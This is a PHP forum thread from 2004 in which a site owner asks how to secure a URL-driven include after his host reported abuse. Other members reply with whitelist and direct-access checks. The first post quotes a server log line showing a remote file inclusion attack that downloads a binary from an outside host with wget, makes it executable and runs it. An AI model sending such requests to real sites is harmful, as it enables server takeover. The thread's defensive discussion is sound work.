Security help needed for includes

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

Security help needed for includes

Post by J Reid »

Hi all,

I got an email from my hosting company saying that they had found someone using my site, and my handwritten code, to try and hack into their servers. I have only a basic understanding of what is being exploited and want some advice on how to prevent it.

Below is some of the server log that was emailed to me. Basically I need to secure my includes. Apparently this is not too difficult.

Code: Select all

www.sharperstill.com 200.158.8.123 - - ї28/Jun/2004:10:46:15 +1000] "GET
/index.php?include=http://www.h4ckbr.org/php.gif?&cmd=cd%20/var/tmp;wget%20h
ttp://h4ckbr.org/bd/44464;chmod%20777%2044464;./44464 HTTP/1.1" 200 4197 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Jon
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

you could switch to a system that doesn't use the url to pass the whole filename, or any part of the filename for the include..
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

Can you elaborate

Post by J Reid »

I'm not sure what my options are......
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

well.. consider the "include" parameter you have as a mode identifier..

so
/index.php?include=members
could correspond to memberinfo.inc.php
and
/index.php?include=threads
could correspond to viewthreads.inc.php

you can achieve this with a switch statement:

Code: Select all

<?php

$include = (!empty($_GET['include']) ? $_GET['include'] : '');
switch($include)
{
  case 'members':
  $include = 'inc/memberinfo.php';
  break;

  case 'threads':
  $include = 'inc/viewthreads.php';
  break;

  default:
  $include = 'inc/mainpage.php';
  break;
}

include $include;

?>
qads
DevNet Resident
Posts: 1199
Joined: Tue Apr 23, 2002 10:02 am
Location: Brisbane

Post by qads »

put all the include files in 1 folder, then use a script to load all the file names in a array, or if youdont have many files, just put the names in the array your self, then get the file name from the url, check the array to see if it exists, if so, include it, else include a error page.

OR

get the file name from the url, use [php_man]file_exists[/php_man] function to see if file exists, if it does, include, else include error page.
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

OK

Post by J Reid »

I can kind of follow that, except I'm not sure how that doesn't use the URL to send the mode identifier.....
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

it does use the url, but doesn't require it. But it doesn't directly use the url in the filename to use. This seperation, and the use of a default value, are the major security things this snippet does.
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Post by John Cartwright »

if you main index page has calls in subpages withen itself you could do this

index.php

Code: Select all

<?php

define("IN_SITE",true);

?>
then on each of your inner pages ( eg. members.php )

Code: Select all

<?php

if (!defined("IN_SITE")
{
exit("You cannot access the page directly");
}

?>
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

Post by J Reid »

My main index page looks for an inclusion, and if it doesn't find one it includes a default making my true index page. If it does find one then it loads that one making a page for contacting me via email. So there are only two includes. The only other page on my site - photo.php - uses the url to pass along variables for extracting the next image from the db etc...

Jon
Post Reply